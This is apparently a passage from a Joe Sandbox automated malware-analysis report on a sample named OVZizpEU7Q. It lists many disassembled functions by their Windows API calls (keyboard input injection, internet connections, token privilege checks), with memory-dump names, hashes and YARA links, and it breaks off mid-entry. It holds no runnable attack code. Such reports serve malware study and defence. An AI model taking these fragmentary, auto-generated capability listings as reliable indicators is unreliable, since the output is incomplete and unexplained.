                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                        • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                                                                                        • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                                                                                        • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                                                                                        Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048AB60
                                                                                        • GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                                                        • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                                                        • MessageBeep.USER32(00000000), ref: 0048AC57
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                        • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                                                                                        • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                                                                                        • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                                                                                        Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                        • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                                                                                        • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                                                        • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                                                                                        Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00460C66
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00460D33
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                        • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                                                        • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                                                        • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                                                        Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                                                        • __isleadbyte_l.LIBCMT ref: 00436229
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                        • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                                                        • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                                                        • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                                                        Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00484F02
                                                                                          • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                                                          • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                                                          • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                                                        • GetCaretPos.USER32(?), ref: 00484F13
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                                                        • GetForegroundWindow.USER32 ref: 00484F54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                        • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                                                        • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                                                        • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                                                        Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • GetCursorPos.USER32(?), ref: 0048C4D2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                                                        • GetCursorPos.USER32(?), ref: 0048C534
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                        • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                                                        • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                                                        • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                                                        Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                          • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                          • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                          • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                          • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                                                        • _memcmp.LIBCMT ref: 004586C6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00458703
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1592001646-0
                                                                                        • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                        • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                                                        • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                                                        • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                                                        Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __setmode.LIBCMT ref: 004209AE
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                        • _fprintf.LIBCMT ref: 004209E5
                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                                                          • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                                                        • __setmode.LIBCMT ref: 00420A1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                        • String ID:
                                                                                        • API String ID: 521402451-0
                                                                                        • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                        • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                                                        • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                                                        • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                                                        Function 00471767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                                                                                          • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                          • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                        • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                                                                                        • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                        • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                                                                                        Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00435101
                                                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                        • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                                        • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                        • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                                        Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 004044CF
                                                                                          • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                          • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                          • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                        • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                                        • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                        • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                                        Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                                        • _memmove.LIBCMT ref: 004763D1
                                                                                        • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 1504782959-0
                                                                                        • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                        • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                                        • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
